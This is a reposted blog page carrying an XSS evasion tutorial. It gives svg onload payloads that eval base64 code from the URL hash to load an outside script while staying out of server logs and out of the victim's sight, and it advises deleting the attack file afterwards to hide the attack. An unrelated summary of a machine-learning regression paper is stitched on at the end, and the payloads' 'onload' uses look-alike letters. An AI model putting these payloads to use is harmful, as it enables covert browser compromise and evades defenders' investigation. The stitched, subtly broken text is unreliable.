【XSS技巧拓展】————27、Avoiding XSS Detection

本文探讨了跨站脚本(XSS)攻击中如何利用SVG onload事件、URL hash部分及base64编码来隐蔽地注入恶意脚本,通过避免被服务器日志记录和用户察觉,提高攻击成功率。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

As any XSSer (one that makes XSS) might know, the script tag is not always available to inject into a XSS hole because it’s the first thing that will be filtered by developer or an WAF (Web Application Firewall). Furthermore, the input may be restricted to only a few chars which makes impossible to put the following javascript code needed to call an external script, in an event handler for example:

with(document)body.appendChild(createElement('script')).src='//DOMAIN'

On the other hand, hiding the suspicious code from the victim is a prerogative for an attack with higher chances to succeed. Some techniques are needed to avoid been spotted, from victim to developer or admin investigation.

We will examine a reflected XSS scenario. Usually encoding the XSS vector is enough to hide it from user’s eyes, but to hide an attacker intention from server logs we need to jump to the hash part of URL:

<svg/οnlοad=eval(location.hash.slice(1))>#with(document)
body.appendChild(createElement('script')).src='//DOMAIN'

The slice(1) function returns the location.hash string from the character at position 1 (# is the 0), which is evaluated by eval() function. Although all the code after # will never be sent to server, thus avoiding any logging, it’s clear that too much suspicious activity is being done here and an user may spot this.

But the worst part is that will not work, at least in Firefox, because the single quotes will be turned into %27 and eval() function will complain about it. We would need to add the decodeURI() function over the location.hash.slice(1), which could make our input larger and with the same user problem above.

So to avoid this, let’s make the hash part become a base64 string. But first, we need to solve the single quotes problem:

#with(document)body.appendChild(createElement
(/script/.source)).src=atob(/Ly9icnV0ZWxvZ2ljLmNvbS5ici8y/.source)

Using “//brutelogic.com.br/2” as the script, which just pops the document domain in an alert box, we get rid of the quotes with the “.source” regex trick in the createElement() function and with the atob() function to encode our source in base64 for the “src” value (along with the same “.source” trick).

Now we can encode in base64 the whole code after hash, which give us the following:

<svg/οnlοad=eval(atob(location.hash.slice(1)))>
#d2l0aChkb2N1bWVudClib2R5LmFwcGVuZENoaWxkKGNyZW
F0ZUVsZW1lbnQoL3NjcmlwdC8uc291cmNlKSkuc3JjPWF0b
2IoL0x5OWljblYwWld4dloybGpMbU52YlM1aWNpOHkvLnNv
dXJjZSk=

The last step is to get our input that will go to the server a little shorter: using the URL property of document, which is a string, we can set the starting point of it from the end using a negative value:

<svg/οnlοad=eval(atob(URL.slice(-148)))>
#d2l0aChkb2N1bWVudClib2R5LmFwcGVuZENoaWxkKGNyZW
F0ZUVsZW1lbnQoL3NjcmlwdC8uc291cmNlKSkuc3JjPWF0b
2IoL0x5OWljblYwWld4dloybGpMbU52YlM1aWNpOHkvLnNv
dXJjZSk=

It’s boring to double encode and calculate the length of the final base64 string, so I made a simple payload generator here.

The eval() function can also be replaced by setInterval() and setTimeout() functions in case of a blacklist. But the several ways to play with strings in javascript and ways of encoding the chars usually are enough to bypass most filters. There’s also the backticks option against parenthesis filtering as we can see here.

Even with our efforts, script code can still be discovered. To hide it, in server side, it’s possible to use obfuscators like this one. But it can be reversed, so if we really want to not let anyone know what’s happened to the victim it’s better to self delete the file from server after the targeted attack.

Proof of Concept (PoC) code is here and it works similarly to this: rename it to index.php and put it in a web server folder. But be sure to have it writable by the web server user and save a copy for replacement after deleting.

#hack2learn

内容概要:本文详细探讨了基于樽海鞘算法(SSA)优化的极限学习机(ELM)在回归预测任务中的应用,并与传统的BP神经网络、广义回归神经网络(GRNN)以及未优化的ELM进行了性能对比。首先介绍了ELM的基本原理,即通过随机生成输入层与隐藏层之间的连接权重及阈值,仅需计算输出权重即可快速完成训练。接着阐述了SSA的工作机制,利用樽海鞘群体觅食行为优化ELM的输入权重和隐藏层阈值,从而提高模型性能。随后分别给出了BP、GRNN、ELM和SSA-ELM的具体实现代码,并通过波士顿房价数据集和其他工业数据集验证了各模型的表现。结果显示,SSA-ELM在预测精度方面显著优于其他三种方法,尽管其训练时间较长,但在实际应用中仍具有明显优势。 适合人群:对机器学习尤其是回归预测感兴趣的科研人员和技术开发者,特别是那些希望深入了解ELM及其优化方法的人。 使用场景及目标:适用于需要高效、高精度回归预测的应用场景,如金融建模、工业数据分析等。主要目标是提供一种更为有效的回归预测解决方案,尤其是在处理大规模数据集时能够保持较高的预测精度。 其他说明:文中提供了详细的代码示例和性能对比图表,帮助读者更好地理解和复现实验结果。同时提醒使用者注意SSA参数的选择对模型性能的影响,建议进行参数敏感性分析以获得最佳效果。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值